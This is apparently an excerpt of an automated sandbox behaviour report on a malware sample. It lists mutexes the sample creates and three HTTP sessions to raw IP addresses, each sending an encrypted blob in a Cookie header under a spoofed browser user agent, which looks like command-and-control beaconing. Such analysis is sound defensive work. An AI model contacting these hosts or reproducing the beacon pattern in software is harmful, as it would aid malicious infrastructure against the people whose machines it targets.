Mutex (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEM53C |
|
1 | |
| Create | mutex_name = Global\I705BA84C |
|
1 | |
| Create | mutex_name = Global\M705BA84C |
|
1 | |
| Release | mutex_name = Global\I705BA84C |
|
1 |
Network Behavior
HTTP Sessions (3)
| Information | Value |
|---|---|
| Total Data Sent | 1015 bytes |
| Total Data Received | 156 bytes |
| Contacted Host Count | 3 |
| Contacted Hosts | 96.20.172.107, 64.19.74.49, 99.139.140.129 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 96.20.172.107 |
| Server Port | 8443 |
| Data Sent | 339 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 96.20.172.107, server_port = 8443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 38859=GRm2FIvFHYfiRRyIegN3EKl/2qnf5m3tjHU9Kf7GliutQ4B13lcCrGPxuO05xUjaq57/HuqPLL+olA77+Sl+LGLe9L2bTDaMeME8ytYCka/RGmG1WT2RDeziMTZabA2NFNfdpmKGarWPrYYsewQRljh1JIo6xUtwbSx75SnkDqYpXnwkEuNvIpl67GYEtRWF9ONcb5LkX7UQHiOPAJkx0DYoGn9NFRclX1ksMLu2IgB4WktPBjEsXwuiAi+2p18a4P5IjR46t5rUf6i4RdHWJRlKDVTuA6CpCYI+kgOCSOKmP8RBfcAAAvCvaOLImVOOg2JV93EbJ3ddhB8DCU9inFlj/fplvRHqXn/aK5ryexJ4nH4bDdaaKcY6oFMM5iFmvZfO0d5QjS2L0wJdk3YfSyGEke7UsSf4aAby0j2cXb/JyZLh, url = 96.20.172.107 |
|
1 | |
| Close Session | - |
|
3 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 64.19.74.49 |
| Server Port | 8080 |
| Data Sent | 335 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 64.19.74.49, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 42915=eaIADvumPWAHKCcKAauPU7rDp/PPPJ8LZe+ijlimG4tW8ByavnZPfcAivTAUHKwuW92ZXeVOV+nJeOM5wZ8ameiXQXuCuIZTKo/qfcvBq0dKhT8i28GXEPlnOUSgajAyM9XqoeLrMoPHoUS8tSPOG+aaI10MDGRDLzhWCsitIYos3aCeqRpQ/6pmsJ43lrXvQMvF26uOvKvPA+4SiMKGPvaLJS2tQhLex56N7CjTDCxd9Q/iN6oDeyf4B4I4+dc8oDpQks+9DsEeeeUd8Yb6yLC8FO8lOHdb6YM5/4seyfCaIoFz+97miK20873cFhd6zUXCLI2uM8+pJXXjhQbsg3MYXO1cmw9+tV1OYGNpGa0Bz8qBiurfOp1uQs0LEypdjzMO1gd93MwcYnqklr2Ew5EIFDY=, url = 64.19.74.49 |
|
1 | |
| Close Session | - |
|
3 |
HTTP Session #3
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 99.139.140.129 |
| Server Port | 80 |
| Data Sent | 341 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 99.139.140.129, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 64007=LhoSZXO/174zxMC1LjDz2PYvT5od1isblDcFbKUdZ5sycoDL+Qw76JQPbPKP+IIs4pKFTuJtzRWuMMUZPU8UPieQPZTDgEI0IfHz2XUJ5jzDifWdE/t2KAaNWWe38TCxC6Pyh5Vq4sRIsyFSR8KXtBlYCFGt0HYoU3ny5139qV6dF5PgfKxNeDr8ZR2FgppjUYxSt3CSF54Uv4Y4jakTAAb8C34lihb6sKX7hBuMB3kkyXKBURTqYCdA6rCFgfzx719qhVh1baRnIZQAryswn3xccxNJwN1/MvjvHrN7B1bQLQ3Fnb3xWH8WvuHw+rTH1+6GV5iVu2f56+SdB/nGJIo5qdJRBtxOuq6nLiakRO3pXM2IR7vVs1cpSY0b5BlEy423a3f8irURnrpYARsAQUhVRmo=, url = 99.139.140.129 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Close Session | - |
|
3 |
